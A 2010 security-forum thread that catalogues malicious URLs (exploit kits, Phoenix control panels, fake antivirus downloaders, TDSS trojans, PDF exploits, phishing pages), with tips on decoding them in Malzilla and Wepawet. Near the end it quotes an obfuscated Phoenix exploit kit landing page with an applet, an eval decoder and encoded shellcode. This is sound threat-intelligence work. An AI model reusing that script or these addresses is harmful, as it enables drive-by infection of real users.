Post by: lelenina on August 15, 2010, 05:06:45 am
Code: [Select]
http://camarulon.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://laizamoko.info/cvd/
Fake scanner page
Code: [Select]
http://nocertesl1.com/ab/index.php
Exploit kit
Code: [Select]
http://nocertesl1.com/ab/l.php
Fake AV downloader
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 18, 2010, 03:12:49 am
Code: [Select]
http://softplugin.in/7/?name=best&vid=hidden&cat=kostes&offset=4&last=image&ID=1
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 18, 2010, 09:12:40 pm
Code: [Select]
http://78.26.179.197/index.php
Exploit kit
Code: [Select]
http://78.26.179.197/l.php
Fake AV Downloader
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 19, 2010, 05:10:15 am
Code: [Select]
http://ceberd.com/wev/foolwrite.php
Redirects to pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 19, 2010, 05:34:53 am
Code: [Select]
http://www.bestellkanal.tv/images/redir.php
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 20, 2010, 02:31:25 am
Code: [Select]
http://air3liness.com/in.cgi?20&parameter=jonn4b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://lokonetorzz.com/mms/
Fake scanner page
Code: [Select]
http://nevoex65eo.com/ab/index.php
Exploit kit
Code: [Select]
http://nevoex65eo.com/ab/l.php
Fake AV Downloader
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 20, 2010, 07:14:58 am
Code: [Select]
http://78.26.179.203/index.php
Exploit kit
Code: [Select]
http://78.26.179.203/l.php
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 21, 2010, 03:15:00 am
Code: [Select]
http://sugilofyjypomito.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
TDSS
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 21, 2010, 05:29:16 am
Code: [Select]
http://universesearches.com/12/
Redirects to fake porn site
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 21, 2010, 07:22:15 pm
Code: [Select]
http://tokyocrab.in/go.php?sid=6
Redirects to fake porn site with trojan TDSS
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 21, 2010, 10:40:34 pm
Code: [Select]
http://budooqoejofihy.cjb.com/maindirectory/get.php?name=Sex_Toys_Movie_129.mpeg
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 21, 2010, 11:19:23 pm
Code: [Select]
http://10-4warning.com
Yahoo! phishing?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 22, 2010, 12:39:02 am
Code: [Select]
http://first-malware-checker.co.cc/secure1/?id=213
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 22, 2010, 08:23:20 am
Code: [Select]
http://helesouurusa.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
Trojan TDSS
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 23, 2010, 03:06:32 am
Code: [Select]
http://abodeflash-vol33.co.tv/om/ms.php
Trojan
Code: [Select]
http://qusocereloteryg.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 23, 2010, 09:01:24 pm
Code: [Select]
http://host68-video.sytes.net/?n=teen&id=1
Fake porn site leads to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 23, 2010, 10:22:02 pm
Code: [Select]
http://scantrafficstruct.co.cc/installer.0042.exe
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 24, 2010, 04:26:24 am
Code: [Select]
http://mediaforearth.com/video-plugin.45031.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 25, 2010, 04:04:31 am
Code: [Select]
http://iakoberoonn.info/mmb/
Fake scanner page
Code: [Select]
http://nevobbqq2o.com/ab/index.php
Exploit kit
Code: [Select]
http://nevobbqq2o.com/ab/l.php
Fake AV
Code: [Select]
http://nevobbqq2o.com/ab/exe.exe
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 25, 2010, 07:01:02 pm
Code: [Select]
http://best-antimalware-scanner.co.cc/secure1/?id=213
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 25, 2010, 10:21:51 pm
Code: [Select]
http://interammo.com/shop/images/redir.php
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 26, 2010, 01:50:18 am
Code: [Select]
http://xvideostube.cjb.net/
Fake porn site directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 27, 2010, 12:56:27 am
Code: [Select]
http://free-scanner-online.co.cc/secure1/?id=213
Fake scanner page
Code: [Select]
http://szyseyz.co.cc/x/1.zip
Trojan?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 27, 2010, 06:00:17 pm
Code: [Select]
http://grillout3s.com/in.cgi?20&parameter=jonn4b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 27, 2010, 07:20:37 pm
Code: [Select]
http://onlineservice1.co.cc
Fake scanner page
Code: [Select]
http://onlineservice1.co.cc/?do=getexe&id=1
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 28, 2010, 01:02:57 am
Code: [Select]
http://rorty-tube.com/xplays.php?id=45031
Directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 28, 2010, 07:17:11 am
Code: [Select]
http://elenatyr3s.com/in.cgi?20&parameter=jonn4b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://kiamagentoss.net/evo/
Fake scanner page
Code: [Select]
http://whykersspt.com/aa/index.php
http://whykersspt.com/aa/tmp/libtiff.pdf
http://whykersspt.com/aa/l.php?i=8
http://whykersspt.com/aa/exe.exe
Exploit kit fake AV downloader as payload
Code: [Select]
http://1eb6499c0d3856f5220e282fec1592.co.cc/preinst.php?id=02909
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 04, 2010, 12:32:36 am
Code: [Select]
http://xxxvideo-xjxq.cz.cc/go/?afid=94&time=1283559846
Trojan downloader
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 04, 2010, 12:40:03 am
Code: [Select]
http://merlion3oll.com/in.cgi?20&parameter=jonn4b&ur=1&HTTP_REFERER=nnn1
Redirects to fake scanner page
Code: [Select]
http://tucointopp.com/img/
Fake scanner page
Code: [Select]
http://jazzstibbtm.com/aa/index.php
Exploit kit
Code: [Select]
http://jazzstibbtm.com/aa/l.php
http://jazzstibbtm.com/aa/exe.exe
Fake AV Downloader
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 05, 2010, 04:45:41 pm
Code: [Select]
http://noplic.org/
Redirects to fake porn site with trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 05, 2010, 04:48:34 pm
Code: [Select]
http://solo-hootersxxx.redirectme.net/downloadflow/flowplayer.10.467.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 05, 2010, 09:20:06 pm
Code: [Select]
http://slut-topxxx.sytes.net/?id=0
Fake porn site leads to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 06, 2010, 06:31:55 am
Code: [Select]
http://log_account_activation.t35.com/verifyaccount.html
Facebook phishing
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 08, 2010, 10:59:13 pm
Code: [Select]
http://balls-boobsxxx.servehttp.com/flow-download/install_flow_player.10.284.exe
Trojan
Code: [Select]
http://keygen.fileave.com/drivers.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 08, 2010, 11:23:14 pm
Code: [Select]
http://pleasing-tube.com/xplays.php?id=45031
Directs to trojan
Code: [Select]
http://loadmediameans.com/video-plugin.45031.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 12, 2010, 10:23:04 pm
Code: [Select]
http://merlion3oll.com/in.cgi?20&parameter=jonn4b&ur=1&HTTP_REFERER=nnn1
Redirects to fake scanner page
Code: [Select]
http://uikou.in/scaner/?id=02909
Fake scanner page
Code: [Select]
http://zestrsooots.com/aa/index.php
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 17, 2010, 03:32:20 am
Code: [Select]
http://nojtul.co.cc/c/index.php
Phoenix Exploit Kit
Code: [Select]
http://nojtul.co.cc/c/statistics.php
Control panel of Phoenix Exploit Kit
Code: [Select]
http://nojtul.co.cc/c/l.php
http://nojtul.co.cc/c/exe.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 25, 2010, 02:31:30 am
Code: [Select]
http://buyshieldec.com/dimesis.php?ID=19776
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 25, 2010, 02:57:31 pm
Code: [Select]
http://jewertlins.com/stars/index.php
Exploit kit
Code: [Select]
http://jewertlins.com/stars/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on September 27, 2010, 02:45:35 am
Code: [Select]
http://titolutis.cn/1/index.php
Phoenix Exploit kit
Code: [Select]
http://titolutis.cn/1/statistics.php
Control panel of Phoenix Exploit Kit
Code: [Select]
http://titolutis.cn/1/l.php
http://titolutis.cn/1/exe.exe
Swisyn trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 11, 2010, 03:55:35 pm
Code: [Select]
http://huzytaj.co.cc/get/index.php
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: SysAdMini on October 11, 2010, 04:01:27 pm
Code: [Select]
http://huzytaj.co.cc/get/index.php
Exploit kit?

Do you receive any content from this URL? I don't get anything.

Special referer?
Title: Re: Malicious Domains by Lelenina
Post by: GmG on October 11, 2010, 05:59:24 pm
Code: [Select]
http://huzytaj.co.cc/get/?pg=171&action=italynew&e=post

Same as
http://www.malwaredomainlist.com/mdl.php?search=jabylat.co.cc&colsearch=All&quantity=50

but

/get/?pg=171&action=italynew&e=post

works only with an IP from Italy
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 13, 2010, 03:41:40 am
Code: [Select]
http://goupdates.is.com/
Redirects to exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 15, 2010, 07:54:12 pm
Code: [Select]
http://vobuzmgsy.ru/wint2/
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 16, 2010, 07:07:29 pm
Code: [Select]
http://eveninglottery.cz.cc/index.php?s=2&u=4cb83405e1f594cb83405e2342
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: GmG on October 16, 2010, 07:49:23 pm
Code: [Select]
http://eveninglottery.cz.cc/index.php?s=1&u=4cb83405e1f594cb83405e2342
http://eveninglottery.cz.cc/index.php?s=2&u=4cb83405e1f594cb83405e2342
http://eveninglottery.cz.cc/d.jar
http://eveninglottery.cz.cc/java.php?jar=1
http://eveninglottery.cz.cc/pdf3.php
http://eveninglottery.cz.cc/loadd.php
http://eveninglottery.cz.cc/load.php?sploit=JAVASMB

http://www.virustotal.com/file-scan/report.html?id=643c9528038b7f0202cc07c18536beca7004849aa2c9dbfc1dd2dcd9313937ba-1287242215
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 16, 2010, 08:35:48 pm
Code: [Select]
http://eveninglottery.cz.cc/index.php?s=1&u=4cb83405e1f594cb83405e2342
http://eveninglottery.cz.cc/index.php?s=2&u=4cb83405e1f594cb83405e2342
http://eveninglottery.cz.cc/d.jar
http://eveninglottery.cz.cc/java.php?jar=1
http://eveninglottery.cz.cc/pdf3.php
http://eveninglottery.cz.cc/loadd.php
http://eveninglottery.cz.cc/load.php?sploit=JAVASMB

http://www.virustotal.com/file-scan/report.html?id=643c9528038b7f0202cc07c18536beca7004849aa2c9dbfc1dd2dcd9313937ba-1287242215
Thanks. How did you find all of those URLs? Wepawet did not work for me.
Title: Re: Malicious Domains by Lelenina
Post by: GmG on October 16, 2010, 09:14:35 pm
I tried index.php?s=1&u=4cb83405e1f594cb83405e2342
1 instead of 2
and decoded the page with Malzilla

http://wepawet.iseclab.org/view.php?hash=f4a5bbcd8cd803d4184f32535466751b&t=1287263312&type=js
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 17, 2010, 08:20:11 pm
Code: [Select]
http://pihrbu.net.in/scaner/?id=02915
Fake scanner page
Code: [Select]
http://pihrbu.net.in/get.php?id=02915
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 18, 2010, 03:26:03 am
Code: [Select]
http://zgggrusd.ru/wint2
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 19, 2010, 03:41:37 am
Code: [Select]
http://updatenews.cz.cc/firefox-updates/
Fake Firefox update
Code: [Select]
http://updatenews.cz.cc/firefox-updates/ff_secure_upd.exe
Fake AV
Code: [Select]
http://binertug.com/2ajimifr1.php?s=IBBGA
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 19, 2010, 11:22:01 pm
Code: [Select]
http://bentrolmy.com/3d8h6j60fll.php?s=IBBGA
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 21, 2010, 03:58:05 am
Code: [Select]
http://djdbttb.co.cc/red.php
Iframe directs to exploit kit
Code: [Select]
http://broundfal.com/dm3rgu.php?s=IBBKB
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 21, 2010, 08:33:53 pm
Code: [Select]
http://4frank.cz.cc/c/enasfmdtiwjwkujm1.php
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 21, 2010, 11:44:23 pm
Code: [Select]
http://curtyacupt.com/mytds/go.php?s=32
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 22, 2010, 06:58:45 pm
Code: [Select]
http://myutilitom.com/eoiouo8aa781io/kwgmctgvjrfmcqy.php
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 22, 2010, 09:17:08 pm
Code: [Select]
http://webvideocentral.net/xplays.php?id=45031
Directs to trojan
Code: [Select]
http://fileplatz.com/video-plugin.45031.exe
Trojan
Code: [Select]
http://ymedonesalykura.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
Trojan
Code: [Select]
http://190.162.24.18:11066/index.html?u=406&t=1
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 22, 2010, 09:23:09 pm
Code: [Select]
http://sungbyuk.com/51ba0qq5x.php?s=IBBGA
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 23, 2010, 11:56:45 pm
Code: [Select]
http://bestrecie.com/bjzlmpc779rh.php?s=IBBKB
Exploit kit
Code: [Select]
http://bestrecie.com/yocraqywyoyqe.pdf
http://bestrecie.com/yudrevgpeukrini.pdf
http://bestrecie.com/fpdletxubniuewd.pdf
http://bestrecie.com/crknxwbocphwctf.pdf
PDF exploits
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 24, 2010, 06:30:03 am
Code: [Select]
http://vitaminki.co.cc/
If referrer is Google, iframe directs to exploit kit.
Code: [Select]
http://yourqare.com/anawa8h8.php?s=IBBKB
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 27, 2010, 03:40:37 am
Code: [Select]
http://lampasit.com/dx.php?i=91e33396-775d-4b95-81ce-c5084c00a332&a=1091409010&f=0
TDSS
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 29, 2010, 11:28:10 pm
Code: [Select]
http://availableused.co.cc/red.php
Redirects to exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 31, 2010, 12:44:09 am
Code: [Select]
http://whitesquarecube.com/1/gqitgzjqhlfph.pdf
http://ujsoltfinl.com/xwgzjmgwyvht.pdf
PDF exploits
These PDF files are encrypted. Can Malzilla be used to find the URLs of the payloads they download? If not, how can the URLs be found?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on October 31, 2010, 01:08:01 am
Code: [Select]
http://company777.com/xp.php?ID=19776
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 01, 2010, 03:20:27 am
Code: [Select]
http://brindlamp.com/j2pc33.php?s=IBBKB
Phoenix exploit kit
Code: [Select]
http://brindlamp.com/fpxohzcnfwklkze.pdf
PDF exploit
With the new Phoenix exploit kits, the path to the payload is completely random. It is not as simple as l.php or exe.exe anymore. How can I find the URL to the payload if Wepawet is being too slow?
Thanks.
Title: Re: Malicious Domains by Lelenina
Post by: SysAdMini on November 01, 2010, 10:00:12 am
Code: [Select]
http://brindlamp.com/j2pc33.php?s=IBBKB
Phoenix exploit kit
Code: [Select]
http://brindlamp.com/fpxohzcnfwklkze.pdf
PDF exploit
With the new Phoenix exploit kits, the path to the payload is completely random. It is not as simple as l.php or exe.exe anymore. How can I find the URL to the payload if Wepawet is being too slow?
Thanks.


Use Malzilla's decoder tab:
1. Delete everything that is marked red.
2. Cut the green block and paste it at the end of the script.

Quote
<body id='izyqk' name='izyqk'><applet archive="xvjtjsbuynhvj.jar" code='bpac.a.class'><param name="a" value='RSS=,TT#M;BD^FZ=IVQZTSONI=R='/></applet></body><textarea>function btbnhm7(ctywcq){return ctywcq.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));}document.write('<p>1177</p>');var gwevh8=parseInt(izyqk.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var ipcncr='';for (xtjscnj = gwevh8; xtjscnj > 0; xtjscnj--){for (iwazgry = gwevh8-xtjscnj; iwazgry <= emgves.length; iwazgry=iwazgry+gwevh8){ipcncr=ipcncr+emgves.charAt(iwazgry);}}var ethmxz=ipcncr+"}MDAC();";var isaqbpx=btbnhm7(ethmxz);eval(isaqbpx);</textarea><textarea id='jlhoi2'>String.fromCharCode(101,0x76,97,0x6c);</textarea><script>var emgves="db<Ptd10ov5u%00d8u%0008u%1c10u%4c5eu%a890u%00e8u%1c08u%2525u%ee20u%0500u%1616u%9008u%60c0u%d02du%3433u%6000u%75b5u%f617u%0%A633u%s%2647usu%C603ianmipl`)`Bt;v<tved.c{0mp(lM).;tnampcnttn`i`rr.bX(D`fhe}(j)rbXn`w`Di&nnd`;dwh`rufnuh`%n`per;=`g.s``teuf=i`egem.n.i6u`daepuwh~u`{a4it6}of)pnc`*`=6`)o`uOt;tu.VpT`ntcb;ttvtr`.i~uut.Jtvo~o``````tf`MG`0oortucNpUeylusr`t`;;)l``~1mzcyi8*ptes(0xVi`}n)si``se`+te+2lu`tgrkleo%n2k0;o0o`eyrn';hunpnj`2-Bh`n(`v8`d-3h`Ae`/>eivlu`tk)n(be}soe6)7=)11A=vy0v(w/rnn;`da)(te{ib}wcae)(nle)ti`ootiDunt)'B03ps)epre'='.';(viF((e)t;M`••hcoa=etmtsE0;com.:DD;omreCpmglpe'puCae}}Lit3v'd'nAm>cn'syx'g>i)mr;cte==(tl.)i14bevt{id)dMdu{742F28636D`000F0342ED085C94E7B6CE1B5E9C2038A48C54808B0BF4E8798FF67ECFC95F503260C03005C4FFB634558C6A603E177669383C316F02472D441D37581D78Ae00000A1011616364616A6F7465636E67070E00000002040v0240644E69ccwVn9=|,,Ws',tA9F'063252A70683;,st60h4F7768306373f,es12aA23232F2E292v)'eE2359594867606C'd6'A64A202A285B670Na82F902A45427B7460eOPPS`e)'t`esmoni`orr[ath'[lp()xe|1ve)Pkff'de;(U)H`hceiW|2Is,9muueexpi`y(5+]=00013133FF55C507F000C600F2D7C656241627F526061656969697364633341656B72456477690F756A69001A00050309010109010403000806000
B0A4701020201L{hoo/dh:C0da20u%c1b8u%0015u%2f27u%2fa0u%150du%1c04u%208cu%2800u%a050u%9000u%f754u%0390u%0c00u%01b0u%3e1eu%0000u%f352u%4600u'u%E226uku%D200k7u%F29orcpoBom;(ahwa`hawVp`vxpeeea;aey(cpet`heg+san(fOMnr(CrnrnV)eOMc=i=Eg`uui&}th`~nnueni&ue0t.gi`i)le(0i`l`=sAo~oesgms)n=eg(rnfe)t=tu,s38;tu{ege=2==4|{n+sLh}onz(rlfehta}oia``cnsznvyzoiaf`f4+a0~~``>abb8uu`;nLe(UmpCnigara}}`osa;0uUkts84rOlis8ftzmig{hs+hcb0)hc=8cn-hte`cncue0.)}cxr3w)ttddimtld`cBB~t't'=a6+=84=+Md+>'mna;ln(T{e'jciinr);67;00K`a(0a'h2`gu`+yt;'anf+u}.tra;'tdt.ocsncBcAmtA;cD-6.x;Ol`c,`hc,sqali))c`c}B'••tonv=rre(sE0ohcec819}ce`aTleikpp;pmhu)cSOdh0imo>ace<ua`sp-`h<o{eH})ox``)`es`d10s{(ivge!ooFnv06F6675686t800222EA9FB5636A69E2902C9B9D9830D8B0F84EB835F3CFEE3F9853E818A3554E150FC84305F78338011C8636DF5ED741E050E3344F62C5A423F125DBE9Ds0000CE400057166666368406A7273650107000304494F00a2070660616tkaa','(00Iv)0h'FF+0C7826287435}1ah2Fe02776366B616(01aF9m7A262A252A53={528F+E5E592766673WaE5F302129260E6A60`=E7F0082B4E646A78'pADDH=E;st0(eecdolni`^t(()0va'{pl|1cl&Dz(<dfo'eI;1AoktoI(2Nv0,en0s(1;nS=a<)='7005649EFF7FEA0E0040AD006E646C430C6E04637C657129756834746A6A7F650F140F5363077D644969760A140A0206190113000002003B210B620807D01202006OI`cddf=CF0yr50eu%c0b5u%1e2fu%664eu%f800u%200cu%26e8u%0068u%150eu%0615u%0006u%2417u%0f00u%6000u%b32du%0000u%0000u%ece5u%5702;7u%E399d2u%F60d06u%E3n`ttnacathsihltil`(r=obt.n`t}smpmot.i>)d``.v`0uMoueUUoteuD`MMo.`d`Fi0mmg`vhi<0`cnwes`~wxyN,f~n{e{()o+t(=.rf`fmute./c`l])ocu`;3`ht`.2,eynvo~o`````|t``hEi;tcg)ozuweog;tor?(oe.Vck.nSor`|```rxA`b1=xcl`nni`cEM~Jpefcz`rirei!ci`}2mU`e.`8oPlzi))aeuftte``Ya~;{ix`%oc`)Op=)gk0w0l{fk8(5f;(.iole('C=lFC`=o.s`r4`~C8~``_`';enrvle'i}wQekfots.}66}((Eur)-r%i)t(;i``eb#'do+tcsi`tgi.(EinkteuykCe(tpl99'Cmvbist'1tof..rel;;u{h}(h•stmei`nyn'iF0.`unlA-3}unnt'i-nilldeein{aWA`=0eoc<mcDejma=eswt/ndnTf{LO-e.'nu+:c0tr'oaax=cvrca3C79246E76h200038B60D2E81714CE8A22290AF61CD83652BCB5BC28BABDDEFFDFA83FB5310FB205F3B08707503CD54C27568643BDEF3CEF6EE69D102B5445D64E850F5Ca000006700C637C69747525696
26075010507000007F7D00r020169056Eiwvr)0Ws',N=),e+80t029242976387i6me7Cs206724727B78s'+m80e3252529512E2=fA+25'2F2459762778It16B7062428282A7609tA9F'05A454F34783;lDFFO`lprr)'tbuCnvspf,c'f;].r'Sjs()rs&Fe(=o'u,)C}0ccwVnNs,`n'0me8cn0}gCns0{n480005508FFDF71489800161096F01636F6D4572356C4374736E2A646968406C6A604A5F687803426F756418030F070706090327010900003CDC604A0B000002020CAE(uyi10A-0>`1ed4u%97ebu%a0f8u%30b8u%9010u%2f2fu%8913u%6e15u%20a0u%a5a5u%00d4u%7637u%7328u%0001u%1177u%0c08u%000fu%3426u%56ev46u%630+F6u%833797u%D`siy(s`xheesi.hs;A)o`iaypa=heipessyno`{`l~vat,nzvmMbXw`tmr/fzvpft~~tx``i0a`l`~v.cfs.0`fF.H``sssnss{n`it`mr`|`[bhmn2.fe;;ttnOt20i3~N~`mpcaf`f4+a3|`hs~eAseytO;tynf`reeyn``vuwnn4pfscn`a|S+2gfl+e6`ilobtt`i4G~zot.kte=gnglf=azmi4`Jssh+;t`cez;`b`l`hhl~~bp)`hs)uud3s;Pa`;t`0`0ebi.0v0u})cvcdn';h`a28w~bgto`;'c180'npt+dne`a;wQmt`uc'`nrisi)7c))Hn`;(`ul`u0f+t=Edd)Cr)eatogegdbgln`=y'mI((n't.a68)rlajc`(';tmaor`.e}}tJ(f)t•mp/'g'e`tOdA-l(mtaDB'emt`e)cs;tioonnlcntFD='''vu/eeomqel'=hi=o`otMuiof1di)gb`Df0rejnrtO-uiotrA64367E206e500B43FFB41AA34EEFC88E7A8EBB5E05BCC7000FF55A9F5980C8F79F3C8D9CC5F7EB073F1F4F53CC07084046E767F462E48EC20E4AB50CD4A1CAEAA2D0813m000009F174C696C62626E71756A64771202000000080063`2000C60796vaei;,Iv)4`={1st60h707628566668f,es12a369603375676v)'eE232A58262E7625'd6'A64A2A4E5A20730Na82F502328585A6360,h'FF+0F2847396365}aF((Wde.ci;hAomh`=(ti]h.is)js)Hves)be((.l9f)t4{K}(tkaa'`v89=),os0ao0n(.esxmo6000B6800FF1DA290160073006574716B696C746361636963734E491975256264646C475C647F7465636E680F090B070A0809000000060643106607D100352202006DPem>v``8A>~s%8800u%cbfeu%0090u%0490u%0500u%f8f8u%5e13u%ee20u%080au%e9fcu%0614u%378fu%c157u%00bau%b845u%105eu%00f0u%e5c4u%56a626u%F0'346u%2=4707u%Qho.me=Aia`.lli.}r;tfdb.wb=.lnt.g(.enttne,aih`cot,fOM`cu`e`Cotruh0;sF>>txr?ew`ap2ucvx+uFf`t(ttigiit`~phueaa|Sts)[e)putC}oicLh~;s2oH)~petr`|```r2|sri`dU.mpi(}oDcug~(mp(ccanfe~((uPB(sr`t`;;)l``~1mzcy``=+(b)nSyNDi;=`g.s``teuf)zoi~e`}o=o)ei!l+t(*rl``Ie;iY.;n0e(hr;ruwh+0e0nlns0a;n}{r'u(tddi's50i0jebbtvol7A~>aUa'ot
rvrt`uerAit)(`oouf`)a;;Eemvqn0e{`,o+u`lye;h`{(tangE.'ogeni'l>ed))torssC3;e2rea=')qp/lpete(cteAeu{tbb:t;aMt{.B`CAaee(s93;le(=E;acd'cycdtdh.c(F`3`>ijp=smbc=ls'od'blcBLnfw()cn`ts'2-0(t'``of1memi`213D246F3Cs0C4FDDEEB36B09B8A37BBA9A4DF08C66402803742F8D0117EF7BFD4EC10C8080536055C45F1F3C09F751047E206459CD6506F250FCADACE91304A70999BB9e000009006D68096D64636673616C4216080200010060300t02006D0765evFai1N=|59'i1ah2Fe364232F64276(01aF9m5A7F63637137={528F+02E24292E5A2WaE5F30282A4F607070`=A7F008432E2F2B67'0e+50t02543593C663fcL))Poms'bpetreiPP)=f+(')v;oe)Oh`v{l`l'pv3z;(0sTf)iwvr)1n7,=|1rc8pp0o0lw81ep50000E050FF6BB55000027000475437C4D7F6475297168367075697B736E716C32616D456563406A7273650C14050107010A170302040007D4200B0047000502020CFE)e<>hcA2<)ku%30c4u%eef5u%0008u%6000u%6618u%1590u%a05fu%a000u%9060u%5530u%56c7u%3427u%b00bu%28d0u%95e2u%20b0u%2510u%5667u%8r8216u%0%A633u%s%2647uUenfa)`lsp:veesvtr}ou(efKl`as(yl)0fw(hhen`llil.Ef`CMo~ar+MUUEfon)1v.,`>sF```i+lr`naaF`nFu=atraztzzhs`linmyr`tat)tw)rneo;to(Ei)`.~l(;ot.i`a|S+2g``iozc`TNpeot;tftna))peaoortuw)a~njPaigara}}`osa;0uUkt=:`+ac;sc.iDoi`i)le(0i`l`{nSz)a(;t`d{`f=e`is2oc+bC(f`bn}e0`(ee}enh`=0m)goau0r`cfve)md.iol<sD-d~et'jaabs-B`'mnr<cBHe`rAi'ycc.;c=lnb`|)t}}Aseaquc(`=zr)`de.fdi(b'ct`=ls,d)medMe<n(;{.bies5Ata.`ct`a;.:tses`xtar(V)ntpr•/6iti`vcJ=-Bu)n'sCEosn'`lotre;amuC.((lh)L~0i<eqa'saem'oaact3jeuy`c(e'{.d+htc79~ou,Fmr(`e'JolF66367D7F6a603017D5A836B6B9C577FE80546B104807403F434195777F27CDF4F41085B598535803080567CF1B340C0046F3C7D3C3C3E364BBE35247B4358E0B35DEB44200000A10E6929716149756473656306070C000201020002h20001605E0Xelbf1`=|,,Wf5me78s6A7A292E3067s'+mC0eE647A3669786=fD+28'66292A242E24It16B708284568675809tA5F'020492926666;,st60h795749686865deA;;Dcee,u.itdnlDd;(=)f)[=liI;Wvi=Seivfdf4j}'0eIu{vaei;0='0'|5ya'e.0p,e`92m`70C4060F0FFD73B2106060000067269686379702F637C2A606474666373667A2A75694E59217569626075151A0A0C0209010C070000010000D60F6037D0D28202400LE{nd<el94/;d5u%3403u%e0f5u%00a0u%001cu%a515u%2000u%09b3u%0029u%0c0eu%d500u%8695u%5853u%385bu%5a05u%9e
